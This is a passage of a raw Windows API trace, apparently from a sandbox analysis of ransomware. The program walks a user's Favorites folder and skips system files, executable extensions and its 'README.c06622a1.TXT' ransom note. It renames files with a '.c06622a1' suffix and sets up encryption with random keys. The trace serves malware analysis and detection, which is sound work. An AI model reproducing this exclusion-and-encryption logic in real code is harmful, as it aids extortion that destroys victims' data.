(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url", dwFileAttributes=0x80) returned 1 [0150.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0150.199] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.199] CloseHandle (hObject=0x644) returned 1 [0150.199] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.199] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" [0150.199] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 0x46 [0150.199] wcscpy (in: _Dest=0x4510124, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.199] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.c06622a1"), dwFlags=0x8) returned 1 [0150.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0150.201] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.201] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x48b0020 [0150.206] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2c2f5d [0150.206] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6640fd12 [0150.206] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x43cda380 [0150.206] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7964fba0 [0150.206] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x289a21cf [0150.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc50d92 [0150.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xbf2267 [0150.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x610054f [0150.210] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x48b0094, Length=0x80) returned 0x2c17bddc [0150.210] RtlComputeCrc32 (PartialCrc=0xbddc, Buffer=0x48b0094, Length=0x80) returned 0xe3f424ff [0150.210] RtlComputeCrc32 (PartialCrc=0x24ff, Buffer=0x48b0094, Length=0x80) returned 0x710f04b9 [0150.210] RtlComputeCrc32 (PartialCrc=0x4b9, Buffer=0x48b0094, Length=0x80) returned 0x66807a74 [0150.210] RtlComputeCrc32 (PartialCrc=0x7a74, Buffer=0x48b0094, Length=0x80) returned 0x921e5ca9 [0150.210] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0150.210] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.210] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.210] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0150.210] _wcsicmp (_Str1="MSN Sports.url", _Str2="README.c06622a1.TXT") returned -5 [0150.210] wcsstr (_Str="MSN Sports.url", _SubStr="README") returned 0x0 [0150.210] _wcsicmp (_Str1="autorun.inf", _Str2="MSN Sports.url") returned -12 [0150.210] wcslen (_String="autorun.inf") returned 0xb [0150.210] _wcsicmp (_Str1="boot.ini", _Str2="MSN Sports.url") returned -11 [0150.210] wcslen (_String="boot.ini") returned 0x8 [0150.210] _wcsicmp (_Str1="bootfont.bin", _Str2="MSN Sports.url") returned -11 [0150.210] wcslen (_String="bootfont.bin") returned 0xc [0150.210] _wcsicmp (_Str1="bootsect.bak", _Str2="MSN Sports.url") returned -11 [0150.210] wcslen (_String="bootsect.bak") returned 0xc [0150.210] _wcsicmp (_Str1="desktop.ini", _Str2="MSN Sports.url") returned -9 [0150.210] wcslen (_String="desktop.ini") returned 0xb [0150.210] _wcsicmp (_Str1="iconcache.db", _Str2="MSN Sports.url") returned -4 [0150.210] wcslen (_String="iconcache.db") returned 0xc [0150.210] _wcsicmp (_Str1="ntldr", _Str2="MSN Sports.url") returned 1 [0150.210] wcslen (_String="ntldr") returned 0x5 [0150.210] _wcsicmp (_Str1="ntuser.dat", _Str2="MSN Sports.url") returned 1 [0150.210] wcslen (_String="ntuser.dat") returned 0xa [0150.210] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSN Sports.url") returned 1 [0150.210] wcslen (_String="ntuser.dat.log") returned 0xe [0150.210] _wcsicmp (_Str1="ntuser.ini", _Str2="MSN Sports.url") returned 1 [0150.211] wcslen (_String="ntuser.ini") returned 0xa [0150.211] _wcsicmp (_Str1="thumbs.db", _Str2="MSN Sports.url") returned 7 [0150.211] wcslen (_String="thumbs.db") returned 0x9 [0150.211] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.211] wcslen (_String="386") returned 0x3 [0150.211] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.211] wcslen (_String="adv") returned 0x3 [0150.211] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.211] wcslen (_String="ani") returned 0x3 [0150.211] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.211] wcslen (_String="bat") returned 0x3 [0150.211] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.211] wcslen (_String="bin") returned 0x3 [0150.211] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.211] wcslen (_String="cab") returned 0x3 [0150.211] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.211] wcslen (_String="cmd") returned 0x3 [0150.211] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.211] wcslen (_String="com") returned 0x3 [0150.211] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.211] wcslen (_String="cpl") returned 0x3 [0150.211] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.211] wcslen (_String="cur") returned 0x3 [0150.211] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.212] wcslen (_String="deskthemepack") returned 0xd [0150.212] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.212] wcslen (_String="diagcab") returned 0x7 [0150.212] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.212] wcslen (_String="diagcfg") returned 0x7 [0150.212] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.212] wcslen (_String="diagpkg") returned 0x7 [0150.212] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.212] wcslen (_String="dll") returned 0x3 [0150.212] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.212] wcslen (_String="drv") returned 0x3 [0150.212] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.212] wcslen (_String="exe") returned 0x3 [0150.212] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.212] wcslen (_String="hlp") returned 0x3 [0150.212] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.212] wcslen (_String="icl") returned 0x3 [0150.212] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.212] wcslen (_String="icns") returned 0x4 [0150.212] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.212] wcslen (_String="ico") returned 0x3 [0150.212] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.212] wcslen (_String="ics") returned 0x3 [0150.212] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.212] wcslen (_String="idx") returned 0x3 [0150.212] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.212] wcslen (_String="ldf") returned 0x3 [0150.212] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.212] wcslen (_String="lnk") returned 0x3 [0150.212] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.212] wcslen (_String="mod") returned 0x3 [0150.212] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.212] wcslen (_String="mpa") returned 0x3 [0150.212] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.212] wcslen (_String="msc") returned 0x3 [0150.212] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.212] wcslen (_String="msp") returned 0x3 [0150.212] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.213] wcslen (_String="msstyles") returned 0x8 [0150.213] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.213] wcslen (_String="msu") returned 0x3 [0150.213] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.213] wcslen (_String="nls") returned 0x3 [0150.213] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.213] wcslen (_String="nomedia") returned 0x7 [0150.213] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.213] wcslen (_String="ocx") returned 0x3 [0150.213] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.213] wcslen (_String="prf") returned 0x3 [0150.213] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.213] wcslen (_String="ps1") returned 0x3 [0150.213] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.213] wcslen (_String="rom") returned 0x3 [0150.213] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.213] wcslen (_String="rtp") returned 0x3 [0150.213] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.213] wcslen (_String="scr") returned 0x3 [0150.213] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.213] wcslen (_String="shs") returned 0x3 [0150.213] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.213] wcslen (_String="spl") returned 0x3 [0150.213] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.213] wcslen (_String="sys") returned 0x3 [0150.213] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.213] wcslen (_String="theme") returned 0x5 [0150.213] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.213] wcslen (_String="themepack") returned 0x9 [0150.213] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.213] wcslen (_String="wpx") returned 0x3 [0150.213] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.213] wcslen (_String="lock") returned 0x4 [0150.213] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.213] wcslen (_String="key") returned 0x3 [0150.213] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.213] wcslen (_String="hta") returned 0x3 [0150.213] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.214] wcslen (_String="msi") returned 0x3 [0150.214] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.214] wcslen (_String="pdb") returned 0x3 [0150.214] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.214] wcslen (_String="sql") returned 0x3 [0150.214] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.214] wcslen (_String="sqlite") returned 0x6 [0150.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0150.214] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.214] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0150.214] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0150.214] wcscpy (in: _Dest=0x4500102, _Source="MSN Sports.url" | out: _Dest="MSN Sports.url") returned="MSN Sports.url" [0150.214] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", dwFileAttributes=0x80) returned 1 [0150.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0150.214] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.214] CloseHandle (hObject=0x610) returned 1 [0150.214] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.214] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" [0150.215] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 0x47 [0150.215] wcscpy (in: _Dest=0x4510126, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.215] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.c06622a1"), dwFlags=0x8) returned 1 [0150.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x610 [0150.217] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.217] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4940020 [0150.222] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a39b817 [0150.222] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7db7fd71 [0150.222] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6beb096f [0150.222] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x549430b2 [0150.222] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x309409c [0150.222] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x53dc7458 [0150.222] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x74299bb4 [0150.222] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7b9258f9 [0150.225] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4940094, Length=0x80) returned 0xe83e0822 [0150.225] RtlComputeCrc32 (PartialCrc=0x822, Buffer=0x4940094, Length=0x80) returned 0xe89d9132 [0150.225] RtlComputeCrc32 (PartialCrc=0x9132, Buffer=0x4940094, Length=0x80) returned 0x69b7672e [0150.225] RtlComputeCrc32 (PartialCrc=0x672e, Buffer=0x4940094, Length=0x80) returned 0xf6eab1bd [0150.225] RtlComputeCrc32 (PartialCrc=0xb1bd, Buffer=0x4940094, Length=0x80) returned 0x667943f9 [0150.225] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0150.225] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.225] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.225] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0150.225] _wcsicmp (_Str1="MSN.url", _Str2="README.c06622a1.TXT") returned -5 [0150.225] wcsstr (_Str="MSN.url", _SubStr="README") returned 0x0 [0150.226] _wcsicmp (_Str1="autorun.inf", _Str2="MSN.url") returned -12 [0150.226] wcslen (_String="autorun.inf") returned 0xb [0150.226] _wcsicmp (_Str1="boot.ini", _Str2="MSN.url") returned -11 [0150.226] wcslen (_String="boot.ini") returned 0x8 [0150.226] _wcsicmp (_Str1="bootfont.bin", _Str2="MSN.url") returned -11 [0150.226] wcslen (_String="bootfont.bin") returned 0xc [0150.226] _wcsicmp (_Str1="bootsect.bak", _Str2="MSN.url") returned -11 [0150.226] wcslen (_String="bootsect.bak") returned 0xc [0150.226] _wcsicmp (_Str1="desktop.ini", _Str2="MSN.url") returned -9 [0150.226] wcslen (_String="desktop.ini") returned 0xb [0150.226] _wcsicmp (_Str1="iconcache.db", _Str2="MSN.url") returned -4 [0150.226] wcslen (_String="iconcache.db") returned 0xc [0150.226] _wcsicmp (_Str1="ntldr", _Str2="MSN.url") returned 1 [0150.226] wcslen (_String="ntldr") returned 0x5 [0150.226] _wcsicmp (_Str1="ntuser.dat", _Str2="MSN.url") returned 1 [0150.226] wcslen (_String="ntuser.dat") returned 0xa [0150.226] _wcsicmp (_Str1="ntuser.dat.log", _Str2="MSN.url") returned 1 [0150.226] wcslen (_String="ntuser.dat.log") returned 0xe [0150.226] _wcsicmp (_Str1="ntuser.ini", _Str2="MSN.url") returned 1 [0150.226] wcslen (_String="ntuser.ini") returned 0xa [0150.226] _wcsicmp (_Str1="thumbs.db", _Str2="MSN.url") returned 7 [0150.226] wcslen (_String="thumbs.db") returned 0x9 [0150.226] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.226] wcslen (_String="386") returned 0x3 [0150.226] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.226] wcslen (_String="adv") returned 0x3 [0150.226] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.226] wcslen (_String="ani") returned 0x3 [0150.226] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.226] wcslen (_String="bat") returned 0x3 [0150.226] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.226] wcslen (_String="bin") returned 0x3 [0150.226] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.226] wcslen (_String="cab") returned 0x3 [0150.226] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.226] wcslen (_String="cmd") returned 0x3 [0150.226] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.226] wcslen (_String="com") returned 0x3 [0150.227] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.227] wcslen (_String="cpl") returned 0x3 [0150.227] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.227] wcslen (_String="cur") returned 0x3 [0150.227] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.227] wcslen (_String="deskthemepack") returned 0xd [0150.227] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.227] wcslen (_String="diagcab") returned 0x7 [0150.227] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.227] wcslen (_String="diagcfg") returned 0x7 [0150.227] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.227] wcslen (_String="diagpkg") returned 0x7 [0150.227] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.227] wcslen (_String="dll") returned 0x3 [0150.227] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.227] wcslen (_String="drv") returned 0x3 [0150.227] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.227] wcslen (_String="exe") returned 0x3 [0150.227] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.227] wcslen (_String="hlp") returned 0x3 [0150.227] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.227] wcslen (_String="icl") returned 0x3 [0150.227] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.227] wcslen (_String="icns") returned 0x4 [0150.227] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.227] wcslen (_String="ico") returned 0x3 [0150.227] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.227] wcslen (_String="ics") returned 0x3 [0150.227] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.227] wcslen (_String="idx") returned 0x3 [0150.227] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.227] wcslen (_String="ldf") returned 0x3 [0150.227] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.227] wcslen (_String="lnk") returned 0x3 [0150.227] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.227] wcslen (_String="mod") returned 0x3 [0150.227] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.228] wcslen (_String="mpa") returned 0x3 [0150.228] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.228] wcslen (_String="msc") returned 0x3 [0150.228] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.228] wcslen (_String="msp") returned 0x3 [0150.228] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.228] wcslen (_String="msstyles") returned 0x8 [0150.228] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.228] wcslen (_String="msu") returned 0x3 [0150.228] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.228] wcslen (_String="nls") returned 0x3 [0150.228] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.228] wcslen (_String="nomedia") returned 0x7 [0150.228] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.228] wcslen (_String="ocx") returned 0x3 [0150.228] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.228] wcslen (_String="prf") returned 0x3 [0150.228] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.228] wcslen (_String="ps1") returned 0x3 [0150.228] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.228] wcslen (_String="rom") returned 0x3 [0150.228] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.228] wcslen (_String="rtp") returned 0x3 [0150.228] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.228] wcslen (_String="scr") returned 0x3 [0150.228] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.228] wcslen (_String="shs") returned 0x3 [0150.228] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.228] wcslen (_String="spl") returned 0x3 [0150.228] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.228] wcslen (_String="sys") returned 0x3 [0150.228] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.228] wcslen (_String="theme") returned 0x5 [0150.228] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.228] wcslen (_String="themepack") returned 0x9 [0150.228] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.228] wcslen (_String="wpx") returned 0x3 [0150.228] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.229] wcslen (_String="lock") returned 0x4 [0150.229] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.229] wcslen (_String="key") returned 0x3 [0150.229] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.229] wcslen (_String="hta") returned 0x3 [0150.229] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.229] wcslen (_String="msi") returned 0x3 [0150.229] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.229] wcslen (_String="pdb") returned 0x3 [0150.229] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.229] wcslen (_String="sql") returned 0x3 [0150.229] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.229] wcslen (_String="sqlite") returned 0x6 [0150.229] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites")) returned 0x10 [0150.229] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.229] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0150.229] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 0x38 [0150.229] wcscpy (in: _Dest=0x4500102, _Source="MSN.url" | out: _Dest="MSN.url") returned="MSN.url" [0150.229] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", dwFileAttributes=0x80) returned 1 [0150.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x658 [0150.230] SetFilePointerEx (in: hFile=0x658, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.230] CloseHandle (hObject=0x658) returned 1 [0150.230] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.230] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" [0150.230] wcslen 